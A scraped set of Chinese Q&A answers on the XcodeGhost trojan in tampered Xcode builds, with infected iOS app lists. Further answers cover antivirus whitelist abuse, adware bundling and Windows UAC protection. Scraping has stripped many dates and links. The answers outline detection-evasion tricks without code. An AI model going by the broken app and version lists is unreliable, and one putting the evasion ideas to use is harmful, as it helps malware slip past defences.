7的用户可以开启UAC,WindowsXP用户可以安装带有主动防御功能的杀毒软件(比如卡巴),并打开防火墙。这样基本就没有问题了。&br&&br&============日志结束的分割线=============&br&&br&&br&&br&第一次看的时候不能理解,&br&现在想想大概是一个喜爱的日漫被广电封了以后愤怒无处发泄的宅男写的东西吧
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号
)。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:/*长文预警!好多人说看不下去这么多代码,确实代码…
来自子话题:
个人强烈建议阅读这个回答的答案,比我写得权威也好理解:&a class=&internal& href=&/question//answer/&&XcodeGhost 事件会造成什么影响? - Sai 的回答&/a&&br&&br&下面是我的回答,这个回答主要分为回答问题以及没受影响和受了影响 App 名录两个部分(现在这个回答已经和前期回答发生很大变化,所以前期对我这个回答点了“赞同”的用户,还请酌情取消“赞同”,总之事态发展太快,麻烦了!):&br&&br&&blockquote&&b&强烈建议修改 Apple ID 的相关密码。&/b&&b&强烈建议修改 Apple ID 的相关密码。&/b&&b&强烈建议修改 Apple ID 的相关密码。微信 9 月 10 日发布的 6.2.5 版本已经被微信官方公告确认被感染,随后微信 9 月 12 日发布了 6.2.6 版本修护了这个问题,因为这个木马现在看来半年前就开始出现,并且受感染的 App 数目之多也可以说是叹为观止,这期间木马是否有用弹窗来诱导用户输入 Apple ID 以及密码现在已经不得而知了,但是为了帐号安全,Apple ID 的密码还请尽快修改。话说回来,微信知道 Xcode 被注入的时间点是在 9月 10 日左右,比国家互联网应急中心应该还快了几天。(根据这篇文章,看来是&a class=& wrap external& href=&///?target=http%3A///index.php/blog/msg/96& target=&_blank& rel=&nofollow noreferrer&&腾讯安全应急响应中心&i class=&icon-external&&&/i&&/a&在12日的时候,向国家互联网应急中心汇报了)。&br&&/b&&/blockquote&&br&&b&就这个问题而言,造成什么影响,我觉得主要的影响是这几个方面:&br&&br&0.不少用户对 iOS 的生态的信任感遭到破坏,这一点是我感到最大的损失,尤其是很多人非黑即白的眼中,出了问题很容易推出“ iOS 很危险”的奇怪结论,就算发生这种事情,我认为 iOS 目前还是最好的移动操作系统之一,目前出问题的 App 以 360 扫描的成果为例,不到总数的 0.5%,多数国民级别的 App 并没受到影响。(但是还是建议不管使用什么 Android 还是 iOS,都要增强自己的安全意识。定期修改重要账户的密码以及重要账户不要使用同一个密码是非常关键的事情。)&br&&br&1.受影响的 App 很容易被简单粗暴的删除(我其实是很不推荐这么做的)或者遭到大规模的 1 星评分,这会严重影响这些产品的运营及成果。网易云音乐作为第一个爆出来的知名 App,可以说受到极其严重的影响,而微信一天之内一星评价剧增(这不排除竞争对手借机刷恶评),这些都对是这些产品极其严重而又典型的伤害。而且现在苹果的处理方式是先下架问题版本,最近几天运营的数据肯定很糟糕。&br&&br&2.本质上也给一线程序员敲了警钟,几十年前的破坏原理到现在依旧可能造成恶劣的影响,对大多数 iOS 程序员上了一课:一定要去 Mac App Store 下载 Xcode,而与之相关的安全方面的意识只能说希望借此机会得到重视。&br&&br&其余苹果是否会加强程序安装或者打包应用增强安全性未可知,丁磊被一次又一次调侃“黑苹果”是否会痛定思痛给开发人员更换白苹果未可知,以后我们能不能不用翻就能连上 Mac App Store 下载 App 未可知。(这回问题还有蛮大一部分原因是众所周知的其他国家的原因,当然不知道原因的当我没说这句话。)&br&&br&-----------------------------------------&br&&/b&第一部分结束,下面是第二部分:&br&&br&我检查了下,没什么问题的白名单部分,如果这部分有问题还望提醒:&br&自我检测了一下自己安装的,这些常用的 App
(支付宝、微信6.2.6、QQ、新浪微博官方客户端、VVebo、FORK、知乎、QQ邮箱、兴业银行、中国银行、招商银行、掌上生活、京东、淘宝、天猫、亚马逊、什么值得买、1号店、大众点评、腾讯新闻、网易新闻、QQ音乐、网易有道词典、美团、糯米、拉手)目前的版本都没有受到 XcodeGhost 影响的。&br&&br&==========&br&最大的影响是建议所有安装过以下 App 的用户在相关版本更新前不要使用这些 App,等待新版本更新后再使用。&br&虽然现在知道的上传服务器已经主动下线,但是不能排除这些 App 的使用风险。&br&&b&另外再次强烈建议修改 Apple ID 的密码。&/b&&br&&br&下面是受本次事件影响的 App 列表(如有异议还请私信或者回复),&i&&u&斜体+下划线&/u&&/i&说明已经修护&br&==========&br&最初版本:&br&根据乌云的消息:&a href=&///?target=http%3A//drops.wooyun.org/news/8864& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&XCode编译器里有鬼&i class=&icon-external&&&/i&&/a&&br&中招名单:&br&1.&i&&u&网易云音乐(问题版本号2.8.3,更新日期日)(更新版本号2.9.0,更新日期日)&/u&&/i&&br&作为 Apple 的知名开发商,网易一直用黑苹果开发也就算了,没想到连接 MAS 的网速会慢到要去其他地方下载 Xcode。这次事件虽然目前看只是一个网易云音乐的问题,但是这种不规范的开发流程足以极大伤害云音乐的品牌,而且挂着“网易”的前缀,其他网易系的 App 似乎也很难避免不受影响。&br&&br&==========&br&14 点更新:&br&根据消息(&a href=&///?target=https%3A///fannheyward/status/424704& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/fannheyward&/span&&span class=&invisible&&/status/424704&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&)&br&新加入木马套餐的有:&br&1.&i&&u&滴滴打车(滴滴出行,问题版本号4.0.0,更新日期日)(&/u&&/i&&i&&u&&i&&u&修护版本号4.1.0,更新日期日&/u&&/i&)&/u&&/i&&br&2.&i&&u&铁路12306(问题版本号2.1,更新日期日)(修护版本号2.11,更新日期日)&/u&&/i&&br&3.&u&&i&中信银行动卡空间(问题版本号?,更新日期?)(修护版本号3.4.5,更新日期日)&/i&&/u&&br&&br&这几个装机量足够大的 App 加进来后,果然网易云音乐明显不会这么那么瞩目的吸引炮火了。&br&&br&==========&br&15 点更新:&br&跟过节一样,木马套餐添加新产品:&br&&a href=&///?target=https%3A///tualatrix/status/767553& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/tualatrix/s&/span&&span class=&invisible&&tatus/767553&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A////CB6OD8IHz%3Ffrom%3Dpage_9133_profile%26wvr%3D6%26mod%3Dweibotime%26type%3Dcomment& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&第三轮测试结果如下:6、下厨房;7、51卡保... 来自图拉鼎&i class=&icon-external&&&/i&&/a&&br&1.中国联通手机营业厅(版本号3.2,更新日期日)&br&2.&u&&i&高德地图(问题版本号7.3.8,更新日期日)(修护版本号7.5.0,更新日期日)&/i&&/u&&br&3.简书(版本号2.9.1,更新日期日)&br&4.开眼(版本号1.8.0,更新日期日)&br&5.网易公开课(版本号4.2.8,更新日期日)&br&6.&i&&u&下厨房(问题版本号4.3.2,更新日期日)(修护版本号4.4.0,更新日期日)&/u&&/i&&br&7.51卡保险箱(版本号5.0.1,更新日期日)&br&8.同花顺(版本号9.60.01,更新日期日)&br&&br&=========&br&18 点更新:&br&来源 知乎用户&a href=&/people/zhou-yi-ling-31& class=&internal&&周逸灵&/a& 评论&br&1.Lifesmart(版本号1.0.44,更新日期日)&br&来源 v2ex &a class=& wrap external& href=&///?target=http%3A///t/Fp%3D2%23& target=&_blank& rel=&nofollow noreferrer&&垃圾网易,开发 iOS 还用黑苹果? Xcode 还在百度上去下载?&i class=&icon-external&&&/i&&/a& 184楼 评论&br&1.&u&&i&马拉马拉(问题版本号1.1.0,更新日期日)(修护版本号:1.2.1,更新日期日)&/i&&/u&&br&2.药给力(版本号1.12.1,更新日期日)&br&3.喜马拉雅(版本号4.3.8,更新日期日)&br&4.口袋记账(版本号1.6.0,更新日期日)&br&&br&========&br&19 点更新:&br&来源 知乎用户 &a href=&/people/rainoxu& class=&internal&&龙小刚&/a& 评论&br&1.有货(版本号3.5.0,更新日期日)&br&2.微链(版本号2.3.0,更新日期日)&br&3.股票雷达(20 点更新)(版本号5.6,更新日期日)&br&来源 知乎用户 &a href=&/people/li-kai-hua& class=&internal&&李凯华&/a& 评论&br&1.&i&&u&南方航空应用(问题版本号2.6.5,更新日期日)(修护版本号2.6.6,更新日期日)&/u&&/i&&br&&br&=========&br&来源 v2ex 消息&br&1.&u&&i&微信(问题版本号6.2.5,更新日期日)(修护版本号6.2.6,更新日期日)&/i&&/u&&br&&b&更新说明,根据微信的公告:&a class=& wrap external& href=&///?target=http%3A////CB9lwqpfZ& target=&_blank& rel=&nofollow noreferrer&&来自腾讯微信团队&i class=&icon-external&&&/i&&/a&确实有,真的是极为蹊跷的存在。&/b&根据&a class=& wrap external& href=&///?target=http%3A///weixinteam& target=&_blank& rel=&nofollow noreferrer&&腾讯微信团队的微博&i class=&icon-external&&&/i&&/a&的公告表示,微信 6.2.5 本身也是感染的,不过9月12日上架的 6.2.6 已经作出了修改,企鹅真是闷声典范。&br&&br&========&br&20 点更新&br&来源 知乎用户 &a href=&/people/li-yun-long-73& class=&internal&&李云龙&/a& 评论&br&1.快速问医生(版本号7.7.3,更新日期日)&br&&br&=========&br&21 点更新&br&来源 知乎用户 &a href=&/people/vvfenng& class=&internal&&i蒹葭从风&/a& 评论&br&1.&i&&u&豆瓣阅读(问题版本号2.1.0,更新日期日)(修护版本号2.1.1,更新日期日)&/u&&/i&&br&2.SuperMii酷脸(版本号1.9.0,更新日期日)&br&来源 &a class=& wrap external& href=&///?target=http%3A///t/& target=&_blank& rel=&nofollow noreferrer&&XcodeGhost:网易云音乐、中信银行动卡空间、12306、滴滴打车、中国联通客户端&i class=&icon-external&&&/i&&/a& 47楼 &b&&a href=&///?target=http%3A///member/iwege& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&iwege&i class=&icon-external&&&/i&&/a&&/b&回复&br&1.CamScanner(中文“扫描全能王”)(版本号3.8.1,更新日期日)&br&&br&========&br&19日 0 点更新&br&来源 知乎用户 &a href=&/people/zhuyujun& class=&internal&&朱瑜骏&/a& 评论&br&1.懒人周末(版本号1.3.0,更新日期日)&br&&br&另外附上另外一个回答中的 Google 在线文档地址,可能更新比我这边要快。&br&&a class=& external& href=&///?target=https%3A///spreadsheets/d/1YELrImviQ5ARC8A-WKgNyx0puRxXPMjR3TmSzHghUZA/htmlview%3Fusp%3Dsharing%26sle%3Dtrue& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/spreads&/span&&span class=&invisible&&heets/d/1YELrImviQ5ARC8A-WKgNyx0puRxXPMjR3TmSzHghUZA/htmlview?usp=sharing&sle=true&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&截止19日01:04,这个文档提及但是这个回答中没有提及的几个App供无法访问上一个链接的网友看:&br&1.微博相机(版本号1.5.0,更新日期日)&br&2.CamCard(中文“名片全能王”)(版本号6.5.1,更新日期日)&br&3.SegmentFault(版本号2.8,更新日期日)&br&4.炒股公开课(版本号3.10.01,更新日期日)&br&5.股市热点(版本号2.40.01,更新日期日)&br&6.同花顺爱基金(版本4.20.01号,更新日期日)&br&7.此条信息中本人验证了下有误,故而删除&br&8.&u&&i&滴滴司机-出租车(问题版本号2.9.3,更新日期日)&/i&&/u&&i&&u&(修护版本号2.9.4,更新日期日)&/u&&/i&&br&9.OPlayer(版本号2.1.05,更新日期日)&br&10.讯飞输入法(版本号5.1.1463,更新日期日)&br&&br&========&br&19日 1 点更新&br&怀疑应该也有的&br&1.滴滴专车-司机版(版本号1.1.0,更新日期日)&br&&br&3点更新&br&来源 知乎用户 &a href=&/people/adamlook& class=&internal&&adam look&/a&&br&1.同花顺至尊版(我估计同花顺同一家出来的 App 都是有问题的)&br&&br&补充了版本日期,如果有问题还望指正。&br&先睡觉了。&br&&br&========&br&19日 10 点更新&br&这种东西看来还是能批量操作的效率要高些,虽然我鄙视 360 ,但是这个名单应该还是可信的。&br&来源 360NirvanTeam&br&&a class=& wrap external& href=&///?target=http%3A///p/& target=&_blank& rel=&nofollow noreferrer&&感染XcodeGhost木马App详细名称及版本号&i class=&icon-external&&&/i&&/a&&br&&br&=========&br&20日 0 点更新&br&来源 知乎用户 &a href=&/people/live4love& class=&internal&&live4love&/a&&br&1.凯立德导航(问题版本11.4.1)这个已经在 App Store 上找不到了,应该是被苹果临时下架了。&br&&br&&b&&u&最后,我还是要强调,这里边涉及 App 众多,消息来源也复杂,我不建议大家采用删除的方法来避免问题,我更倾向大家能够等待问题版本的问题被新版本修护后再使用!&br&另外如果发现有问题的 App 名单信息有误,还望提醒指正。&br&&br&=========最近工作太慢,没有特别多时间弄,基本上9月19日之后的更新的 App 应该按照苹果的审核情况,不会再出现 XcodeGhost 的问题了。&/u&&/b&
个人强烈建议阅读这个回答的答案,比我写得权威也好理解:下面是我的回答,这个回答主要分为回答问题以及没受影响和受了影响 App 名录两个部分(现在这个回答已经和前期回答发生很大变化,所以前期对我这个回…
我想说,国家还是挺牛逼的。。。&br&早我们几天就发公告了,也很正统地阐述了影响和伤害,只是没人理他们。。。&br&&br&&a href=&///?target=http%3A//www./publish/main/12/8128_.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&国家互联网应急中心&i class=&icon-external&&&/i&&/a&&br&关于使用非苹果官方XCODE存在植入恶意代码情况的预警通报&br&来源:CNCERT 时间:&br&&br&
近日,CNCERT监测发现,开发者使用非苹果公司官方渠道的XCODE工具开发苹果应用程序(苹果APP)时,会向正常的苹果APP中植入恶意代码。被植入恶意程序的苹果APP可以在App Store正常下载并安装使用。该恶意代码具有信息窃取行为,并具有进行恶意远程控制的功能。&br&
目前,CNCERT正在加强分析,并将此预警信息通报相关开发者或互联网企业,在开发苹果APP过程中,切勿使用非苹果官方渠道的XCODE工具,以维护广大用户的个人信息安全。
我想说,国家还是挺牛逼的。。。早我们几天就发公告了,也很正统地阐述了影响和伤害,只是没人理他们。。。关于使用非苹果官方XCODE存在植入恶意代码情况的预警通报来源:CNCERT 时间: 近日,CNCERT监测发现,开发者使用非苹…
在那遥远的 win95/98 时代,有个叫 CIH 的传说
在那遥远的 win95/98 时代,有个叫 CIH 的传说
&img src=&/dacc741afb28a7e49c9debf_b.png& data-rawwidth=&520& data-rawheight=&376& class=&origin_image zh-lightbox-thumb& width=&520& data-original=&/dacc741afb28a7e49c9debf_r.png&&阿里一生黑。马猴子为了搞双十二,在我电脑上装了AlimamaAgent.exe,整天在我电脑右下角弹出双十二活动页面,还顺手给我装了个叫Win-i386的假开始菜单程序,想取代我的原生开始菜单,默认是随Windows启动的。马猴子装的这两个货,在控制面板的程序里面是找不到的,普通人根本无法卸载。我想强制删除假开始菜单,结果提示这假开始菜单程序正在被Alimama使用着。马猴子已经正式入驻我的电脑了。&br&———————————————————————————————————————————&br&经后续查询确实是金山词霸2016安装的,自动下载的,每次打开金山词霸退出后,会自动下载一个叫wps的文件夹,路径为AppData\Roaming\Kingsoft\addson\Wps。&br&&br&阿里出广告费,金山负责推广。&br&&br&金山词霸卸载了就好了。&br&&br&另外不止是金山在做流氓,阿里的广告费还给了很多别的流氓,请参考:&a href=&///?target=http%3A//bluereader.org/article/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&双11购物节火热,谨防木马乘机而入&i class=&icon-external&&&/i&&/a&。
阿里一生黑。马猴子为了搞双十二,在我电脑上装了AlimamaAgent.exe,整天在我电脑右下角弹出双十二活动页面,还顺手给我装了个叫Win-i386的假开始菜单程序,想取代我的原生开始菜单,默认是随Windows启动的。马猴子装的这两个货,在控制面板的程序里面是找…
来自子话题:
已有的事,后必再有。已行的事,后必再行。日光之下并无新事。岂有一件事人能指着说,这是新的。那知,在我们以前的世代,早已有了。已过的世代,无人记念,将来的世代,后来的人也不记念。《圣经》&br&&br&海恩法则:每1起严重事故背后,必然有29次轻微事故和300起未遂先兆以及1000起隐患。&br&&br&国内创业公司几乎没有一台正版电脑~苹果开发用黑苹果的也不在少数。用各种盗版开发软件更是家常便饭【Dreamweaver,Fireworks,Muse,Rose,Microsoft Visio,Microsoft Project,Navicat,WebStorm,MyEclipse,以及部署在服务器的各种环境,各种软件,优化的,检测的,统计的】。&br&&br&开发更头大的事是引入各种包/库/插件/别人的代码,其实根本没有一个公司对所有代码做代码审查~花费精力太庞大了。&br&&br&【遇到公司项目多,服务器密码,域名密码,各种绑定api及相关申请账号就能写一个A4纸。苦不堪言。苹果的上架账号还要邓白氏码,各种折腾,没有海外信用卡,公司信息早就被其他人获取了(淘宝大把代办,经常需要各种复印件~)】&br&&br&当年C语言之父和同事开玩笑,说他可以自由进入任何系统,当时他真的办到了。原因就是他对同事们的C编译器被动了手脚,编译的任何系统都为他留了后门。【也就是说为了绝对的安全你要懂汇编要自己写个C编译器然后,再写系统内核,再写驱动,当然cpu什么的都要自己造,甚至为了安全你要写一个自己的通信协议,因为你根本不知道哪里有鬼,指令集,接口什么统统重新来一遍。】&br&&br&所谓阳光底下无新鲜事。几十年来各种事都一直存在~不过有些被提到台面而大部分没有。安卓应用大部分被人反汇编,然后加入自己的广告再提交应用市场的事貌似一直就没断过。某些应用市场自己就干的不少。&br&&br&现代复杂系统从本质上安全是不可控的。&br&&br&因为一个钥匙链的结实程度是最细的那个环确定的。&br&&br&现操作系统0day不断~驱动~硬件的问题都不是一般公司可控的【从底层就不安全】。&br&&br&大公司的垃圾内部业务系统~你甚至不知道这些老软件用了网上公开的多少代码。&br&&br&最恐怖的是他们的程序员电脑密码设置的太简单,git密码也太简单,打包密码也很简单,尽管设置的无比长,但是就贴在了桌上,有交叉项目的密码口令就一堆,就写在桌面上(miMa.md),很多公司门禁的作用就是拦住快递。于是真的有人要做什么简直了~&br&&br&隐患多的不胜数,虽有(安全排查手册)和(知识库故障树)但都是然并卵,这世界最脆弱的是人参与的环节~有多少公司都把测试变成了菜鸟干的事。代码审计,程序鲁棒性,系统的软件调试都成了浮云~不知道还有没有对自己app做sniffer抓包分析的~有没有对着控制台和log文件一遍一遍过的~&br&&br&在网上…想要活得自在那就匿名…&br&&br&秦人不暇自哀,而后人哀之;后人哀之而不鉴之,亦使后人而复哀后人也。《阿房宫赋》&br&&br&【整件事,提醒我们太simple,当我们看到电脑中弹起电信的广告弹窗,已经忘记了那是路由器劫持,当我们忘了CNNIC的证书隐患,当我们忘了流出的各种数据库,当我们忘了还有D的监视。我们使用所谓的智能路由器,让他过滤广告,让他科学上网。我们有什么脸说要安全。】
已有的事,后必再有。已行的事,后必再行。日光之下并无新事。岂有一件事人能指着说,这是新的。那知,在我们以前的世代,早已有了。已过的世代,无人记念,将来的世代,后来的人也不记念。《圣经》海恩法则:每1起严重事故背后,必然有29次轻微事故和300起…
首先,愚蠢的Xcode没有(显而易见的)官方离线安装包。&br&其次,因为没有官方的离线安装包,所以官方也不会告诉你官方包的校验值应该是多少。&br&&br&最后,很多团队都有把所有用到的工具搞一份离线包到局域网网服务器的习惯。这样等到下的时候能节省大量的工时。&br&你并不能说这是错的,你们所有dev必须全部给我去Appstore更新然后大家一起更新把公司的网络出口干爆。&br&&br&所以我觉得是Apple的锅(
首先,愚蠢的Xcode没有(显而易见的)官方离线安装包。其次,因为没有官方的离线安装包,所以官方也不会告诉你官方包的校验值应该是多少。最后,很多团队都有把所有用到的工具搞一份离线包到局域网网服务器的习惯。这样等到下的时候能节省大量的工时。你并…
我没看到这一期《经济与法》,不过根据我对防病毒行业和技术的了解,可以来推断一下事情的经过和原因。&br&&br&个人认为题主说的并不太准确,不是木马病毒交钱就可以免杀,而是第三方可以去向360提交“自己开发的程序”或者申诉“自己的程序被误杀”,然后通过某个认证流程可以得到免杀的认证。&br&&br&这其实是一个标准流程,主要用来解决企业自己开发的非流通程序被杀毒软件误杀的问题。然而360内部的管理出了问题,这个流程被人利用了,拿来对木马病毒这种恶意程序做免杀的认证:理论上提交免杀的程序应该经过严格的检查(从各种杀毒引擎交叉扫描到人工逆向分析),由于种种原因(我们不去猜测这些原因),360并没这么干,于是就变成了一个安全漏洞。&br&&br&与传统的杀毒软件(如卡巴斯基)更多依靠行为分析不同,360重度依赖云查杀,云查杀其实是一种文件签名比对技术,简单来说就是把所有文件分为黑白灰三色:黑名单的是病毒、白色的是合法文件,灰色的属于不知道是不是合法,所以需要上传到服务器进行鉴定。本次事件里,就是“黑色有害文件”利用360的流程漏洞伪装为“灰色未知文件”拿去认证为“白色可信文件”的过程。&br&&br&之前有报道说过360在参加国际防病毒大奖测试时,以第三方的本地杀毒引擎来作为检测的主力从而得到了较好的名次,但是正式发布的360个人版这个第三方引擎默认却是关闭的,于是被评奖方判定为作弊,这就是著名的360被吊销国际大奖事件。因为重度依赖云查杀,当云查杀的样本库被人误导、污染了以后,整个系统就处于不设防状态了。&br&&br&参看我之前在“&b&如何评价360在国际防病毒评测中被发现作弊并取消评测结果&/b&”中的回答:&br&&a href=&/question//answer/& class=&internal&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/question/3001&/span&&span class=&invisible&&8630/answer/&/span&&span class=&ellipsis&&&/span&&/a&&br&&br&历史上360为了提高“用户体验”而牺牲安全性的事情还干过很多,例如某段时期为了提高杀毒的速度,对超过一定尺寸大小的文件一律不查,于是好多病毒都把自己塞满垃圾数据,结果成功免杀。&br&&br&一年前我和&a href=&///people/c80e42a0b80ad9f1beb06& data-hash=&c80e42a0b80ad9f1beb06& class=&member_mention& data-tip=&p$b$c80e42a0b80ad9f1beb06&&@唐家声&/a& 吃饭时讨论过通过污染数据达到欺骗防病毒云查杀系统的可能性,现在果然有人真的这么干了,相信以后这么干的会越来越多。未来机器学习,大数据分析,云计算,人工智能等等,都需要警惕数据污染攻击的可能性。&br&&br&哦,对了,360的那套云查杀系统还有另一个大漏洞,不知道什么时候会被人发现,立个旗子坐等。&br&&br&当然了,360的官方有他们自己的观点:&br&&img data-rawwidth=&604& data-rawheight=&1589& src=&/2c362f244d016acefb2ef18_b.jpeg& class=&origin_image zh-lightbox-thumb& width=&604& data-original=&/2c362f244d016acefb2ef18_r.jpeg&&&br&对,你们什么都没做错,你们很完美。&br&&br&再看下法制晚报昨天的消息:&br&&br&&br&&b&360举报员工违法 下周将开庭&/b&&br&法制晚报
17:55 &br&&br&
法制晚报讯(记者范博韬) 今天上午,记者从东城区法院了解到,原北京奇虎科技有限公司员工刘伟利用职务之便涉嫌犯罪一案,将于下周在法院开庭审理。&br&&br&
记者从360公司了解到,2014年公司收到实名举报,反映前员工刘伟利用职务之便,借助公司资源进行违规操作为己牟利。&br&………&br&
2015年全年人工审核拦截下的恶意木马病毒达到5万多个,能逃脱人工审核和人工查杀的只是极端个例。对此类非法行为,360已加强监管措施,遵循“实名认证+技术检测+用户举报”的基本原则,通过多重审核、人工分析、定期回查等措施杜绝此类事件的再次发生。&br&&br&如果两件事情有关联的话,那就是内外勾结,利用制度漏洞,制作可以躲过防病毒软件的病毒木马。
我没看到这一期《经济与法》,不过根据我对防病毒行业和技术的了解,可以来推断一下事情的经过和原因。个人认为题主说的并不太准确,不是木马病毒交钱就可以免杀,而是第三方可以去向360提交“自己开发的程序”或者申诉“自己的程序被误杀”,然后通过某个…
来自子话题:
分享一篇迅雷投毒简单测试:&a href=&///?target=http%3A//gold.xitu.io/entry/56023eabddb263b560c8d254& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&gold.xitu.io/entry/5602&/span&&span class=&invisible&&3eabddb263b560c8d254&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
分享一篇迅雷投毒简单测试:
来自子话题:
&b&&u&请诸位务必给自己的apple ID添加两步验证,并且不要和他人公用你们的apple ID&/u&&/b&&br&&b&&u&请诸位不要相信那个所谓的作者的澄清,完全就是欲盖弥彰,转移视线,姑且不谈他这一次获得了多少用户的信息,光是他带来的这种新的思路,并且成功的进行了尝试,就足够定性为是一种犯罪行为了。&br&&/u&&/b&&br&这个事件的发生,对于广大用户而言,是一场还没有看到结果的灾难,无论你是否是非越狱用户,无论你是否只从apple store下载APP,问题都如影随形,这不是危言耸听。&br&过去Mac OS也好,iOS也好都是相对比较小众的环境,当然随着苹果手机用户的使用量增加,移动支付和移动互动联网的发展,iOS已经成为了众多不法之徒眼中的香饽饽。&br&过去的病毒形式只是简单的寻找&i&&u&愚蠢的用户&/u&,&/i&而这次的xcode ghost则走了一条完全不同的路线,他寻找&i&&u&愚蠢的守护者&/u&,&/i&这就包括了APP的开发者,APP的审核者。&br&&br&&br&由于整个事件截止到目前为止,还只是在APP里发现了后门,并没有用户实际损失的报告。&br&从损失的角度来讲并没有什么,估计要有阵子才能看到这一次的实际损失有多大。&br&但是,对关键就是但是&br&这是一个分水岭。&br&过去的病毒,需要用户把带着病毒代码的程序安装到目标机器上,需要欺骗用户,而苹果提供了一个非常简单的应对措施,那就是闭环。也就是说,除了越狱的用户,只要你乖乖按照苹果说的做,你就是非常安全的。苹果为你建立了一个坚固的堡垒。&br&而这次XCODE GHOST的作者彻底粉碎了苹果的美梦,它给所有在堡垒外的野兽们提供了一条全新的思路,你不再需要费尽心思去欺骗审核人员,欺骗用户,你只需要收买一个拥有通行证的APP就行了,收买的方法就是给他们加个小尾巴,带着病毒,从大门,正正堂堂的走进去。&br&这,是有毁灭意义的。&br&作为曾经的一名IT行业从业者,信息安全的爱好者,我很佩服这个想法的提出者和实践者的智慧,但是我也很害怕,这么多血腥气散发出去,苹果,乃至整个移动互联网要遭受怎样的打击。&br&----------------------------------------------------------------------------------------------------------&br&说些私心话,我希望如果始作俑者或者相关公司团队被查到的话,能够被逮捕,被判刑,最好一辈子都不要放出来,他们的行为不仅仅是一次信息安全的攻防战,他们给所有有着不良想法的人提供了一个无限可能的方案,这种影响短时间是无法消除的,这不仅仅会影响苹果的生态链,对整个中国的互联网所能造成的伤害都是无法估计的。&br&-----------------------------------------------------------------------------------------------------------------&br&看到所谓的始作俑者的澄清,我只想说,呵呵。&br&挑起了一场战争,然后说自己是无心之举,那么倒是想请他解释一下,为什么要掩盖自己的踪迹,为什么要创建一个名字非常有迷惑性的网站,为什么要获取尝试获取用户的信息,为什么在明知道国内开发者的现状和弱点还非挑着这个弱点处心积虑的去宣传自己篡改过的开发工具?&br&无心之举,仅仅是做个实验,这种借口真的屁用都没有&br&-----------------------------------------------------------------------------------------------------------&br&苹果安卓微软三大家全部中招,无一幸免,我真不知道之前还在为这个作者洗地的那些人脑子里都在想什么,这么有组织有预谋不留痕迹的行为,还说自己无意为之。&br&&b&在此提醒各位用户,勤改密码,不要和他人共享你的账户&/b&
请诸位务必给自己的apple ID添加两步验证,并且不要和他人公用你们的apple ID请诸位不要相信那个所谓的作者的澄清,完全就是欲盖弥彰,转移视线,姑且不谈他这一次获得了多少用户的信息,光是他带来的这种新的思路,并且成功的进行了尝试,就足够定性为是一…
&blockquote&我记得近十年前的时候,平时上网即使装着杀毒软件动不动就中毒中木马&/blockquote&这是因为十年前的主流操作系统 Windows XP 安全性很差。&br&&blockquote&现在完全靠win8默认的Windows defender也从没出过问题。&/blockquote&这是因为 Windows 8 的安全性很好。&br&&blockquote&这种变化是客观存在的还是我的错觉?&br&&/blockquote&这种变化是客观存在的。&br&&blockquote&又是什么原因改变了网络环境了呢?&/blockquote&所以这主要不是网络环境的变化,是系统环境的变化。
我记得近十年前的时候,平时上网即使装着杀毒软件动不动就中毒中木马这是因为十年前的主流操作系统 Windows XP 安全性很差。现在完全靠win8默认的Windows defender也从没出过问题。这是因为 Windows 8 的安全性很好。这种变化是客观存在的还是我的错觉?这…
瑞星最成功的产品是“瑞星小狮子”,这是对一个不思进取的传统型杀毒安全企业最大的讽刺:&br&&img src=&/d2edaea356fe2487cfb8_b.jpg& data-rawwidth=&277& data-rawheight=&257& class=&content_image& width=&277&&&img src=&/bea22ec5849_b.jpg& data-rawwidth=&672& data-rawheight=&646& class=&origin_image zh-lightbox-thumb& width=&672& data-original=&/bea22ec5849_r.jpg&&
瑞星最成功的产品是“瑞星小狮子”,这是对一个不思进取的传统型杀毒安全企业最大的讽刺:
来自子话题:
VS2010以上版本反正是不能装在XP上面的了。&br&&br&只要你把VS装进C:\Program Files下面,然后打开UAC,可以保证病毒在修改VS的文件的时候要先征得你的同意,你可以根据需要来决定是否运行这个病毒。不过就算病毒运行了也不一定会成功的,因为VS的重要的文件都是有签名的,而且只要你不用命令行改配置,标记为需要签名的exe将无法加载没有签名的dll,而且.net framework的所有文件也是都签了名的。&br&&br&当你安装VS的时候,如果打开了UAC,这个时候VS要是被改了,UAC会变黄告诉你这个程序没有签名。如果百度改了VS他会告诉你这个VS是百度发行的。你可以根据需要来决定是否运行这个来历不明的安装程序。&br&&br&总之,在Windows7以及更新的系统,只要你开了UAC,并且正常的软件都不要给admin权限运行(VS的话也只有调试那些非得运行在admin的程序才需要用admin来启动VS),那任何病毒要运行之前都得先经过你的同意。当然了,你总是可以根据具体的需要,来决定是否运行病毒。&br&&br&不过操作系统总是不可避免的会有漏洞的。所以开了UAC虽然99%的情况下都安全了,但是还有那1%。不过解决方法很简单,只要你的开发机上只安装跟开发有关的东西,特别是不安装任何国产程序的话,那肯定是安全的。当然了,客户就是上帝,你总是可以根据具体的需要,来决定是否使用admin来安装三大全家桶的。
VS2010以上版本反正是不能装在XP上面的了。只要你把VS装进C:\Program Files下面,然后打开UAC,可以保证病毒在修改VS的文件的时候要先征得你的同意,你可以根据需要来决定是否运行这个病毒。不过就算病毒运行了也不一定会成功的,因为VS的重要的文件都是有…
来自子话题:
